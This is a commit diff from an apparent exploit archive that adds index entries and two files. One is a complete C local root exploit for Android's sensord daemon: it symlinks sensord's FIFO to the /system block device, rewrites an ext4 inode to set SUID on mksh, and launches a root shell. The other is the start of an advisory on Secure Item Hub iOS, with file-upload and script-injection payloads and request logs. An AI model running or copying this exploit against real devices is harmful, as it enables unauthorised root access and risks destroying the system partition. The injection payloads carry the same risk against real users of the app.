DB: 2016-01-28
11 new exploits
This commit is contained in:
parent
67dd87a6f5
commit
a5b96c2067
12 changed files with 1734 additions and 0 deletions
11
files.csv
11
files.csv
|
@ -35573,3 +35573,14 @@ id,file,description,date,author,platform,type,port
|
|||
39329,platforms/windows/dos/39329.py,"InfraRecorder '.m3u' File Buffer Overflow Vulnerability",2014-05-25,"Osanda Malith",windows,dos,0
|
||||
39330,platforms/windows/dos/39330.txt,"Foxit Reader <= 7.2.8.1124 - PDF Parsing Memory Corruption",2016-01-26,"Francis Provencher",windows,dos,0
|
||||
39331,platforms/windows/dos/39331.pl,"Tftpd32 and Tftpd64 Denial Of Service Vulnerability",2014-05-14,j0s3h4x0r,windows,dos,0
|
||||
39332,platforms/php/webapps/39332.txt,"Wiser Backup Information Disclosure Vulnerability",2014-05-19,"AtT4CKxT3rR0r1ST ",php,webapps,0
|
||||
39333,platforms/php/webapps/39333.html,"WordPress Elegance Theme 'elegance/lib/scripts/dl-skin.php' Local File Disclosure Vulnerability",2014-06-08,"Felipe Andrian Peixoto",php,webapps,0
|
||||
39334,platforms/java/webapps/39334.txt,"Yealink VoIP Phones '/servlet' HTTP Response Splitting Vulnerability",2014-06-12,"Jesus Oquendo",java,webapps,0
|
||||
39335,platforms/ios/webapps/39335.txt,"Secure Item Hub 1.0 iOS - Multiple Vulnerabilities",2016-01-27,Vulnerability-Lab,ios,webapps,8080
|
||||
39336,platforms/linux/shellcode/39336.c,"Linux x86/x86_64 tcp_bind Shellcode",2016-01-27,B3mB4m,linux,shellcode,0
|
||||
39337,platforms/linux/shellcode/39337.c,"Linux x86/x86_64 tcp_bind Shellcode #2",2016-01-27,B3mB4m,linux,shellcode,0
|
||||
39338,platforms/linux/shellcode/39338.c,"Linux x86/x86_64 Read etc/passwd Shellcode",2016-01-27,B3mB4m,linux,shellcode,0
|
||||
39339,platforms/php/webapps/39339.txt,"BK Mobile jQuery CMS 2.4 - Multiple Vulnerabilities",2016-01-27,"Rahul Pratap Singh",php,webapps,80
|
||||
39340,platforms/android/local/39340.cpp,"Android sensord Local Root Exploit",2016-01-27,s0m3b0dy,android,local,0
|
||||
39341,platforms/php/webapps/39341.txt,"WordPress Booking Calendar Contact Form <=1.1.24 - Multiple Vulnerabilities",2016-01-27,"i0akiN SEC-LABORATORY",php,webapps,80
|
||||
39342,platforms/php/webapps/39342.txt,"WordPress Booking Calendar Contact Form<=1.1.24 - addslashes SQL Injection Vulnerability",2016-01-27,"i0akiN SEC-LABORATORY",php,webapps,80
|
||||
|
|
Can't render this file because it is too large.
|
474
platforms/android/local/39340.cpp
Executable file
474
platforms/android/local/39340.cpp
Executable file
|
@ -0,0 +1,474 @@
|
|||
|
||||
/*
|
||||
* Android sensord 0day root exploit by s0m3b0dy
|
||||
* tested on LG L7 (PL)
|
||||
*
|
||||
*
|
||||
* need pentests? s0m3b0dy1(at)gmail.com
|
||||
*
|
||||
* * * * * * * * * * * * * * * * * * * * * * * *
|
||||
*
|
||||
* some Android devices have sensord deamon,
|
||||
* for some ROMs the deamon is running as root process(there we can use this exploit)
|
||||
*
|
||||
* and
|
||||
*---------
|
||||
* root@android:/ # strace sensord
|
||||
* ...
|
||||
* open("/data/misc/sensor/fifo_cmd", O_RDWR|O_LARGEFILE) = 12
|
||||
* ...
|
||||
* open("/data/misc/sensor/fifo_dat", O_RDWR|O_LARGEFILE) = 13
|
||||
* fchmod(12, 0666) = 0
|
||||
* fchmod(13, 0666) = 0
|
||||
* ---------
|
||||
* there is no check that the files are not links, so we can link it to eg. block device and make it rw!
|
||||
* exploit will set bit suid on /system/bin/mksh, need to reboot the device after step 1 and step 2
|
||||
*
|
||||
* this exploit is dangerous, before step 1 exploit is disabling auto-rotate to not overwrite /system pertition!
|
||||
*
|
||||
* the author is not responsible for any damage
|
||||
* for education purpose only :)
|
||||
*
|
||||
*/
|
||||
|
||||
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <fcntl.h>
|
||||
#include <unistd.h>
|
||||
#include <sys/stat.h>
|
||||
#include <sys/mman.h>
|
||||
#include <dirent.h>
|
||||
#include <ctype.h>
|
||||
|
||||
|
||||
#define FIFO_DAT "/data/misc/sensor/fifo_dat"
|
||||
#define SH "/system/bin/mksh"
|
||||
|
||||
struct ext4_super_block {
|
||||
/*00*/ __le32 s_inodes_count;
|
||||
__le32 s_blocks_count_lo;
|
||||
__le32 s_r_blocks_count_lo;
|
||||
__le32 s_free_blocks_count_lo;
|
||||
/*10*/ __le32 s_free_inodes_count;
|
||||
__le32 s_first_data_block;
|
||||
__le32 s_log_block_size;
|
||||
__le32 s_log_cluster_size;
|
||||
/*20*/ __le32 s_blocks_per_group;
|
||||
__le32 s_clusters_per_group;
|
||||
__le32 s_inodes_per_group;
|
||||
__le32 s_mtime;
|
||||
/*30*/ __le32 s_wtime;
|
||||
__le16 s_mnt_count;
|
||||
__le16 s_max_mnt_count;
|
||||
__le16 s_magic;
|
||||
__le16 s_state;
|
||||
__le16 s_errors;
|
||||
__le16 s_minor_rev_level;
|
||||
/*40*/ __le32 s_lastcheck;
|
||||
__le32 s_checkinterval;
|
||||
__le32 s_creator_os;
|
||||
__le32 s_rev_level;
|
||||
/*50*/ __le16 s_def_resuid;
|
||||
__le16 s_def_resgid;
|
||||
__le32 s_first_ino;
|
||||
__le16 s_inode_size;
|
||||
__le16 s_block_group_nr;
|
||||
__le32 s_feature_compat;
|
||||
/*60*/ __le32 s_feature_incompat;
|
||||
__le32 s_feature_ro_compat;
|
||||
/*68*/ __u8 s_uuid[16];
|
||||
/*78*/ char s_volume_name[16];
|
||||
/*88*/ char s_last_mounted[64];
|
||||
/*C8*/ __le32 s_algorithm_usage_bitmap;
|
||||
__u8 s_prealloc_blocks;
|
||||
__u8 s_prealloc_dir_blocks;
|
||||
__le16 s_reserved_gdt_blocks;
|
||||
/*D0*/ __u8 s_journal_uuid[16];
|
||||
/*E0*/ __le32 s_journal_inum;
|
||||
__le32 s_journal_dev;
|
||||
__le32 s_last_orphan;
|
||||
__le32 s_hash_seed[4];
|
||||
__u8 s_def_hash_version;
|
||||
__u8 s_jnl_backup_type;
|
||||
__le16 s_desc_size;
|
||||
/*100*/ __le32 s_default_mount_opts;
|
||||
__le32 s_first_meta_bg;
|
||||
__le32 s_mkfs_time;
|
||||
__le32 s_jnl_blocks[17];
|
||||
/*150*/ __le32 s_blocks_count_hi;
|
||||
__le32 s_r_blocks_count_hi;
|
||||
__le32 s_free_blocks_count_hi;
|
||||
__le16 s_min_extra_isize;
|
||||
__le16 s_want_extra_isize;
|
||||
__le32 s_flags;
|
||||
__le16 s_raid_stride;
|
||||
__le16 s_mmp_update_interval;
|
||||
__le64 s_mmp_block;
|
||||
__le32 s_raid_stripe_width;
|
||||
__u8 s_log_groups_per_flex;
|
||||
__u8 s_checksum_type;
|
||||
__u8 s_encryption_level;
|
||||
__u8 s_reserved_pad;
|
||||
__le64 s_kbytes_written;
|
||||
__le32 s_snapshot_inum;
|
||||
__le32 s_snapshot_id;
|
||||
__le64 s_snapshot_r_blocks_count;
|
||||
__le32 s_snapshot_list;
|
||||
#define EXT4_S_ERR_START offsetof(struct ext4_super_block, s_error_count)
|
||||
__le32 s_error_count;
|
||||
__le32 s_first_error_time;
|
||||
__le32 s_first_error_ino;
|
||||
__le64 s_first_error_block;
|
||||
__u8 s_first_error_func[32];
|
||||
__le32 s_first_error_line;
|
||||
__le32 s_last_error_time;
|
||||
__le32 s_last_error_ino;
|
||||
__le32 s_last_error_line;
|
||||
__le64 s_last_error_block;
|
||||
__u8 s_last_error_func[32];
|
||||
#define EXT4_S_ERR_END offsetof(struct ext4_super_block, s_mount_opts)
|
||||
__u8 s_mount_opts[64];
|
||||
__le32 s_usr_quota_inum;
|
||||
__le32 s_grp_quota_inum;
|
||||
__le32 s_overhead_clusters;
|
||||
__le32 s_backup_bgs[2];
|
||||
__u8 s_encrypt_algos[4];
|
||||
__u8 s_encrypt_pw_salt[16];
|
||||
__le32 s_lpf_ino;
|
||||
__le32 s_prj_quota_inum;
|
||||
__le32 s_checksum_seed;
|
||||
__le32 s_reserved[98];
|
||||
__le32 s_checksum;
|
||||
};
|
||||
|
||||
struct ext4_group_desc
|
||||
{
|
||||
__le32 bg_block_bitmap_lo;
|
||||
__le32 bg_inode_bitmap_lo;
|
||||
__le32 bg_inode_table_lo;
|
||||
__le16 bg_free_blocks_count_lo;
|
||||
__le16 bg_free_inodes_count_lo;
|
||||
__le16 bg_used_dirs_count_lo;
|
||||
__le16 bg_flags;
|
||||
__le32 bg_exclude_bitmap_lo;
|
||||
__le16 bg_block_bitmap_csum_lo;
|
||||
__le16 bg_inode_bitmap_csum_lo;
|
||||
__le16 bg_itable_unused_lo;
|
||||
__le16 bg_checksum;
|
||||
__le32 bg_block_bitmap_hi;
|
||||
__le32 bg_inode_bitmap_hi;
|
||||
__le32 bg_inode_table_hi;
|
||||
__le16 bg_free_blocks_count_hi;
|
||||
__le16 bg_free_inodes_count_hi;
|
||||
__le16 bg_used_dirs_count_hi;
|
||||
__le16 bg_itable_unused_hi;
|
||||
__le32 bg_exclude_bitmap_hi;
|
||||
__le16 bg_block_bitmap_csum_hi;
|
||||
__le16 bg_inode_bitmap_csum_hi;
|
||||
__u32 bg_reserved;
|
||||
};
|
||||
|
||||
struct ext4_inode {
|
||||
__le16 i_mode;
|
||||
__le16 i_uid;
|
||||
__le32 i_size_lo;
|
||||
__le32 i_atime;
|
||||
__le32 i_ctime;
|
||||
__le32 i_mtime;
|
||||
__le32 i_dtime;
|
||||
__le16 i_gid;
|
||||
__le16 i_links_count;
|
||||
__le32 i_blocks_lo;
|
||||
__le32 i_flags;
|
||||
union {
|
||||
struct {
|
||||
__le32 l_i_version;
|
||||
} linux1;
|
||||
struct {
|
||||
__u32 h_i_translator;
|
||||
} hurd1;
|
||||
struct {
|
||||
__u32 m_i_reserved1;
|
||||
} masix1;
|
||||
} osd1;
|
||||
__le32 i_block[15];
|
||||
__le32 i_generation;
|
||||
__le32 i_file_acl_lo;
|
||||
__le32 i_size_high;
|
||||
__le32 i_obso_faddr;
|
||||
union {
|
||||
struct {
|
||||
__le16 l_i_blocks_high;
|
||||
__le16 l_i_file_acl_high;
|
||||
__le16 l_i_uid_high;
|
||||
__le16 l_i_gid_high;
|
||||
__le16 l_i_checksum_lo;
|
||||
__le16 l_i_reserved;
|
||||
} linux2;
|
||||
struct {
|
||||
__le16 h_i_reserved1;
|
||||
__u16 h_i_mode_high;
|
||||
__u16 h_i_uid_high;
|
||||
__u16 h_i_gid_high;
|
||||
__u32 h_i_author;
|
||||
} hurd2;
|
||||
struct {
|
||||
__le16 h_i_reserved1;
|
||||
__le16 m_i_file_acl_high;
|
||||
__u32 m_i_reserved2[2];
|
||||
} masix2;
|
||||
} osd2;
|
||||
__le16 i_extra_isize;
|
||||
__le16 i_checksum_hi;
|
||||
__le32 i_ctime_extra;
|
||||
__le32 i_mtime_extra;
|
||||
__le32 i_atime_extra;
|
||||
__le32 i_crtime;
|
||||
__le32 i_crtime_extra;
|
||||
__le32 i_version_hi;
|
||||
};
|
||||
|
||||
void print_usage( char ** argv)
|
||||
{
|
||||
printf("Have 3 steps. You need to reboot the device after step 1 and step 2.\n");
|
||||
printf("Usage: %s 1\n", argv[0]);
|
||||
printf(" %s 2\n", argv[0]);
|
||||
printf(" %s 3\n", argv[0]);
|
||||
printf(" %s verify\n", argv[0]);
|
||||
}
|
||||
|
||||
void get_system_dev( char *ptr, int size )
|
||||
{
|
||||
int fd = open("/proc/mounts", O_RDONLY);
|
||||
int pos = 0, posend = 0, tmppos = 0;
|
||||
char buff[4096];
|
||||
char link[1024];
|
||||
memset(buff, 0, sizeof(buff));
|
||||
memset(link, 0, sizeof(link));
|
||||
memset(ptr, 0, size);
|
||||
if(fd != -1)
|
||||
{
|
||||
read(fd, &buff, sizeof(buff));
|
||||
int sres = (int)strstr(buff, " /system ");
|
||||
if( (sres != -1) && ((pos = (sres - (int)buff)) > 0) )
|
||||
{
|
||||
tmppos = pos;
|
||||
int i=0;
|
||||
while( (buff[pos] != '\n') && (pos > 0) ) pos--;
|
||||
pos++;
|
||||
strncpy(link, &buff[pos], tmppos - pos);
|
||||
readlink(link, ptr, size);
|
||||
|
||||
}
|
||||
else
|
||||
{
|
||||
printf("[-] Can't find system partition!\n");
|
||||
close(fd);
|
||||
exit(0);
|
||||
}
|
||||
close(fd);
|
||||
}
|
||||
else
|
||||
{
|
||||
printf("[-] Can't read /proc/mounts file!\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
void first_step()
|
||||
{
|
||||
if( access(FIFO_DAT, F_OK) != -1 )
|
||||
{
|
||||
unlink(FIFO_DAT);
|
||||
}
|
||||
|
||||
|
||||
char path[1024];
|
||||
get_system_dev(path, sizeof(path));
|
||||
symlink(path, FIFO_DAT);
|
||||
|
||||
printf("[+] Symlink is created, please reboot device and run second step.\n[+] The device may slow down, after second step will work normally.\n");
|
||||
}
|
||||
|
||||
void second_step()
|
||||
{
|
||||
char path[1024];
|
||||
struct stat s;
|
||||
|
||||
unlink(FIFO_DAT);
|
||||
|
||||
stat(SH, &s);
|
||||
printf("[+] Looking for inode no.: %llu\n", s.st_ino);
|
||||
|
||||
get_system_dev(path, sizeof(path));
|
||||
|
||||
int fd = open(path, O_RDWR);
|
||||
if( fd != -1 )
|
||||
{
|
||||
int inodeno = s.st_ino;
|
||||
struct ext4_super_block super;
|
||||
struct ext4_group_desc group_descr;
|
||||
struct ext4_inode inode;
|
||||
|
||||
unsigned long int offset=0;
|
||||
lseek(fd, 0x400, SEEK_SET);
|
||||
|
||||
read(fd, &super, sizeof(super));
|
||||
|
||||
int block_size = 1024 << super.s_log_block_size;
|
||||
int bg = (inodeno-1) /super.s_inodes_per_group;
|
||||
|
||||
lseek(fd, block_size + bg * (super.s_desc_size ? super.s_desc_size : sizeof(struct ext4_group_desc) ), SEEK_SET);
|
||||
read(fd, &group_descr, sizeof(group_descr));
|
||||
|
||||
|
||||
unsigned int index = (inodeno-1) % super.s_inodes_per_group;
|
||||
unsigned int off = index * super.s_inode_size;
|
||||
unsigned long total_offset = block_size + (group_descr.bg_inode_table_lo-1) * block_size + off;
|
||||
|
||||
lseek(fd, total_offset, SEEK_SET);
|
||||
read(fd, &inode, sizeof(struct ext4_inode));
|
||||
|
||||
if(inode.i_size_lo == s.st_size) {
|
||||
__le16 mode = 0;
|
||||
printf("[+] Found inode!\n");
|
||||
lseek(fd, total_offset, SEEK_SET);
|
||||
|
||||
inode.i_mode = inode.i_mode | 0x800;
|
||||
|
||||
int modesize = sizeof(inode.i_mode);
|
||||
int wr = write(fd, &inode.i_mode, modesize);
|
||||
|
||||
if( wr == modesize )
|
||||
{
|
||||
printf("[+] Success, bit SUID is setted on %s\n[+] You must reboot the device to run third step\n", SH);
|
||||
}
|
||||
else
|
||||
{
|
||||
printf("[-] Can't set bit SUID on %s\n", SH);
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
printf("[-] Can't find inode!\n");
|
||||
}
|
||||
close(fd);
|
||||
}
|
||||
else
|
||||
printf("[-] Can't open %s!\n", path);
|
||||
|
||||
}
|
||||
|
||||
void third_step()
|
||||
{
|
||||
char path[1024];
|
||||
//chmod(SH, 4755);
|
||||
setuid(0);
|
||||
setgid(0);
|
||||
if(getuid() == 0)
|
||||
{
|
||||
|
||||
get_system_dev(path, sizeof(path));
|
||||
chmod(path, 0600);
|
||||
printf("[+] Rooted!\n");
|
||||
system(SH);
|
||||
}
|
||||
else
|
||||
{
|
||||
printf("[-] No root here!\n");
|
||||
exit(0);
|
||||
}
|
||||
}
|
||||
|
||||
bool isSensord(char *spath)
|
||||
{
|
||||
char buff[50];
|
||||
bool res = false;
|
||||
int fd = open(spath, O_RDONLY);
|
||||
if(fd != -1)
|
||||
{
|
||||
read(fd, buff, 50);
|
||||
if(strstr(buff, "/system/bin/sensord") != NULL)
|
||||
{
|
||||
res = true;
|
||||
}
|
||||
close(fd);
|
||||
}
|
||||
return res;
|
||||
}
|
||||
|
||||
bool verify()
|
||||
{
|
||||
DIR* dir;
|
||||
struct dirent *entry;
|
||||
char spath[512];
|
||||
bool res = false;
|
||||
struct stat s;
|
||||
|
||||
dir = opendir("/proc");
|
||||
if(dir) {
|
||||
while ((entry = readdir(dir)) != NULL) {
|
||||
if (entry->d_type == DT_DIR) {
|
||||
snprintf(spath, 512, "/proc/%s/cmdline", entry->d_name);
|
||||
|
||||
if (isSensord(spath)) {
|
||||
stat(spath, &s);
|
||||
if (s.st_uid == 0)
|
||||
res = true;
|
||||
|
||||
break;
|
||||
}
|
||||
}
|
||||
}
|
||||
closedir(dir);
|
||||
}
|
||||
return res;
|
||||
}
|
||||
|
||||
void disable_autorotate()
|
||||
{
|
||||
printf("[+] Disabling auto-rotate...\n");
|
||||
system("content insert --uri content://settings/system --bind name:s:accelerometer_rotation --bind value:i:0");
|
||||
}
|
||||
|
||||
int main(int argc, char **argv)
|
||||
{
|
||||
|
||||
if(argc != 2)
|
||||
{
|
||||
print_usage( argv );
|
||||
return 0;
|
||||
}
|
||||
|
||||
if( strstr( argv[1], "1" ) != NULL) {
|
||||
if( verify() ) {
|
||||
disable_autorotate();
|
||||
first_step(); //create link
|
||||
}
|
||||
else
|
||||
{
|
||||
printf("[-] It looks likey is not vulnerable!\n");
|
||||
}
|
||||
}
|
||||
else if( strstr( argv[1], "2") != NULL) {
|
||||
second_step(); //edit ext4(/system) partition(set bit suid)
|
||||
}
|
||||
else if( strstr( argv[1], "3") != NULL) {
|
||||
third_step(); //get root shell
|
||||
}
|
||||
else if( strstr( argv[1], "verify") != NULL){
|
||||
if( verify() )
|
||||
printf("[+] Should be vulnerable!\n");
|
||||
else
|
||||
printf("[-] Not vulnerable!\n");
|
||||
}
|
||||
else{
|
||||
print_usage( argv );
|
||||
}
|
||||
|
||||
|
||||
|
||||
return 0;
|
||||
}
|
465
platforms/ios/webapps/39335.txt
Executable file
465
platforms/ios/webapps/39335.txt
Executable file
|
@ -0,0 +1,465 @@
|
|||
Document Title:
|
||||
===============
|
||||
Secure Item Hub v1.0 iOS - Multiple Web Vulnerabilities
|
||||
|
||||
|
||||
References (Source):
|
||||
====================
|
||||
http://www.vulnerability-lab.com/get_content.php?id=1682
|
||||
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2016-01-27
|
||||
|
||||
|
||||
Vulnerability Laboratory ID (VL-ID):
|
||||
====================================
|
||||
1682
|
||||
|
||||
|
||||
Common Vulnerability Scoring System:
|
||||
====================================
|
||||
7.3
|
||||
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
Transfer files to and from any computer connected to the same WiFi network as your iPhone or iPad using just a web browser! Just drag and drop
|
||||
files into the browser (requires a current version of Chrome, Firefox or Safari) and watch the files appear on your device. You can also connect
|
||||
to other iOS devices that have the Secure Item Hub app and transfer files directly between devices!
|
||||
|
||||
(Copy of the Homepage: https://itunes.apple.com/in/app/secure-item-hub-wifi-file/id537353277 )
|
||||
|
||||
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official Secure Item Hub - WiFi File Sharing mobile iOS wifi web-application.
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2016-01-27: Public Disclosure (Vulnerability Laboratory)
|
||||
|
||||
|
||||
Discovery Status:
|
||||
=================
|
||||
Published
|
||||
|
||||
|
||||
Affected Product(s):
|
||||
====================
|
||||
Pinfolio LLC
|
||||
Product: Secure Item Hub - WiFi File Sharing 1.0
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
High
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
1.1
|
||||
An arbitrary file upload web vulnerability has been discovered in the Secure Item Hub - WiFi File Sharing mobile iOS wifi web-application.
|
||||
The arbitrary file upload web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path
|
||||
commands to compromise the mobile web-application.
|
||||
|
||||
The web vulnerability is located in the `filename` value of the `Upload` module. Remote attackers are able to inject own files with malicious `filename`
|
||||
values in the `Upload` POST method request to compromise the mobile web-application. The local file/path include execution occcurs in the index file dir
|
||||
listing and sub folders of the wifi interface. The attacker is able to inject the lfi payload by usage of the wifi interface or the local file sync function.
|
||||
The attacker can also attach multiple file extensions to bypass the web-server file validation to execute a malicious web-shell finally. Remote attackers can
|
||||
exchange the filename with a double or tripple extension via POST method to bypass the upload validation and filter process. After the upload the attacker access
|
||||
the file with one extension and exchange it with the other one to execute for example own php codes.
|
||||
|
||||
Attackers are also able to exploit the filename issue in combination with persistent injected script code to execute different malicious attack requests.
|
||||
The attack vector is located on the application-side of the wifi service and the request method to inject is POST.
|
||||
|
||||
The security risk of the local file include vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.7.
|
||||
Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privileged web-application user account.
|
||||
Successful exploitation of the arbitrary file upload vulnerability results in mobile application compromise or connected device component compromise.
|
||||
|
||||
Request Method(s):
|
||||
[+] [POST]
|
||||
|
||||
Vulnerable Module(s):
|
||||
[+] Upload
|
||||
[+] Rename
|
||||
|
||||
Vulnerable Parameter(s):
|
||||
[+] filename
|
||||
[+] pairs
|
||||
|
||||
Affected Module(s):
|
||||
[+] Index File Dir Listing (http://localhost:8000/)
|
||||
|
||||
|
||||
|
||||
1.2
|
||||
A local command/path injection web vulnerabilities has been discovered in the official Secure Item Hub - WiFi File Sharing mobile iOS wifi web-application.
|
||||
The vulnerability allows attackers to inject local commands via vulnerable system values to compromise the apple mobile iOS application.
|
||||
|
||||
The vulnerability is located in the vulnerable `devicename` value that becomes visible in the `file dir (index)` module. Local attackers are able to inject own
|
||||
malicious system specific commands or path value requests in the vulnerable `devicename` value. The execution of the local command inject occurs in the `index`
|
||||
module of the mobile application. The attacker is able to manipulate the header name information of the application by preparing to change the local devicename.
|
||||
The encoding of the vulnerable values in the index header module is broken.
|
||||
|
||||
The attack vector is on the application-side and the injection requires physical device access or a local low privileged user account. Local attackers are also
|
||||
able to exploit the filename validation issue in combination with persistent injected script codes to execute different local malicious attacks requests.
|
||||
|
||||
The security risk of the local command/path inject vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 6.1.
|
||||
Exploitation of the command/path inject vulnerability requires a low privileged iOS device account with restricted access and no user interaction.
|
||||
Successful exploitation of the vulnerability results in unauthorized execution of system specific commands and unauthorized path value requests to
|
||||
compromise the mobile iOS application or the connected device components.
|
||||
|
||||
Request Method(s):
|
||||
[+] [SYNC]
|
||||
|
||||
Vulnerable Module(s):
|
||||
[+] Header Location - Web Application
|
||||
|
||||
Vulnerable Parameter(s):
|
||||
[+] devicename (HierarchyText)
|
||||
|
||||
Affected Module(s):
|
||||
[+] Index File Dir Listing (http://localhost:8000/)
|
||||
|
||||
|
||||
|
||||
|
||||
1.3
|
||||
A persistent input validation web vulnerability has been discovered in the official Secure Item Hub - WiFi File Sharing mobile iOS wifi web-application.
|
||||
The vulnerability allows remote attacker to inject malicious persistent script codes to the application-side of the mobile application.
|
||||
|
||||
The vulnerability is located in the path and name (class) values of the `New Folder` and `NewTextFile` modules. The request method to inject is POST and
|
||||
the attack vector is located on the application-side of the mobile app. Remote attackers are able to inject via POST own malicious script codes to compromise
|
||||
the wifi web-application index file dir listing. The validation and encoding of the `New Folder` and `NewTextFile` modules are broken and allows to inject
|
||||
malicious persistent script codes.
|
||||
|
||||
The security risk of the application-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.6.
|
||||
Exploitation of the application-side web vulnerability requires no privileged web-application user account and only low or medium user interaction.
|
||||
Successful exploitation of the vulnerabilities results in persistent phishing, session hijacking, persistent external redirect to malicious
|
||||
sources and application-side manipulation of affected or connected module context.
|
||||
|
||||
Request Method(s):
|
||||
[+] [POST]
|
||||
|
||||
Vulnerable Module(s):
|
||||
[+] NewTextFile
|
||||
[+] New Folder
|
||||
|
||||
Vulnerable Parameter(s):
|
||||
[+] path
|
||||
[+] name (class)
|
||||
|
||||
Affected Module(s):
|
||||
[+] Index File Dir Listing (http://localhost:8000/)
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
1.1
|
||||
The arbitrary file upload web vulnerability can be exploited by remote attackers without privileged web-application user account or user interaction.
|
||||
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
|
||||
|
||||
|
||||
PoC:
|
||||
<tr><td width="20"> </td><td width="50"><input id="checkbox_0" type="checkbox"></td><td valign="top" width="70">
|
||||
<a href=">"><iframe>.png" target="_blank"><img border=0 class=thumbnail src=">"><iframe>.png"></a></td><td valign=top><div>
|
||||
<a target="_blank" class=DirectoryListingLink href="[ARBITRARY FILE UPLOAD VULNERABILITY!].png</a></div><div style="padding-top:5px;"
|
||||
class="SmallText">PNG Image | 538 bytes | modified Mo., 25. Jan., 10:44<BR>
|
||||
<span class=SmallTextButton onclick="renameItem(0);">Rename</span></div></td></tr></table></div></div>
|
||||
|
||||
|
||||
-- PoC Session Logs [POST] ---
|
||||
Status: 200[OK]
|
||||
POST http://localhost:8080/Files// Load Flags[LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[156] Mime Type[text/html]
|
||||
Request Header:
|
||||
Host[localhost:8080]
|
||||
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
|
||||
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
||||
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||||
Accept-Encoding[gzip, deflate]
|
||||
DNT[1]
|
||||
Referer[http://localhost:8080/Files/]
|
||||
Content-Length[722]
|
||||
Content-Type[multipart/form-data; boundary=---------------------------32641154472465]
|
||||
Connection[keep-alive]
|
||||
POST-Daten:
|
||||
POST_DATA[-----------------------------32641154472465
|
||||
Content-Disposition: form-data; name="file"; filename="[ARBITRARY FILE UPLOAD VULNERABILITY!].png"
|
||||
Content-Type: image/png
|
||||
-
|
||||
Status: 200[OK]
|
||||
GET http://localhost:8080/Files/ Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[7148] Mime Type[application/x-unknown-content-type]
|
||||
Request Header:
|
||||
Host[localhost:8080]
|
||||
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
|
||||
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
||||
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||||
Accept-Encoding[gzip, deflate]
|
||||
DNT[1]
|
||||
Referer[http://localhost:8080/]
|
||||
Connection[keep-alive]
|
||||
Cache-Control[max-age=0]
|
||||
Response Header:
|
||||
Content-Length[7148]
|
||||
Date[Mon, 25 Jan 2016 09:42:53 GMT]
|
||||
Server[Pinfolio (modified lighttpd)]
|
||||
-
|
||||
Status: 200[OK]
|
||||
POST http://localhost:8080/API/MoveItems Load Flags[LOAD_BACKGROUND LOAD_BYPASS_LOCAL_CACHE_IF_BUSY ] Größe des Inhalts[2] Mime Type[application/x-unknown-content-type]
|
||||
Request Header:
|
||||
Host[localhost:8080]
|
||||
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
|
||||
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
||||
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||||
Accept-Encoding[gzip, deflate]
|
||||
DNT[1]
|
||||
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
|
||||
Referer[http://localhost:8080/Files/]
|
||||
Content-Length[39]
|
||||
Connection[keep-alive]
|
||||
POST-Daten:
|
||||
pairs[2.png%09%3E%22%3E%3Ciframe%3E.png]
|
||||
Response Header:
|
||||
Content-Length[2]
|
||||
Date[Mon, 25 Jan 2016 09:45:16 GMT]
|
||||
Server[Pinfolio (modified lighttpd)]
|
||||
-
|
||||
Status: 200[OK]
|
||||
GET http://localhost:8080/Files/ Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[7198] Mime Type[application/x-unknown-content-type]
|
||||
Request Header:
|
||||
Host[localhost:8080]
|
||||
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
|
||||
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
||||
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||||
Accept-Encoding[gzip, deflate]
|
||||
DNT[1]
|
||||
Referer[http://localhost:8080/]
|
||||
Connection[keep-alive]
|
||||
Cache-Control[max-age=0]
|
||||
Response Header:
|
||||
Content-Length[7198]
|
||||
Date[Mon, 25 Jan 2016 09:45:18 GMT]
|
||||
Server[Pinfolio (modified lighttpd)]
|
||||
|
||||
|
||||
1.2
|
||||
The local command inject web vulnerability can be exploited by local attackers with local privileged system user account and without user interaction.
|
||||
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
|
||||
|
||||
PoC: Index - Header Information (Web-Application)
|
||||
<title>Files</title>
|
||||
</head><body>
|
||||
<table border=0 cellpadding=0 cellspacing=0 style="width:100%;margin-top:40px;">
|
||||
<tr>
|
||||
<td width=65> </td>
|
||||
<td valign=top>
|
||||
<div class="HierarchyText">
|
||||
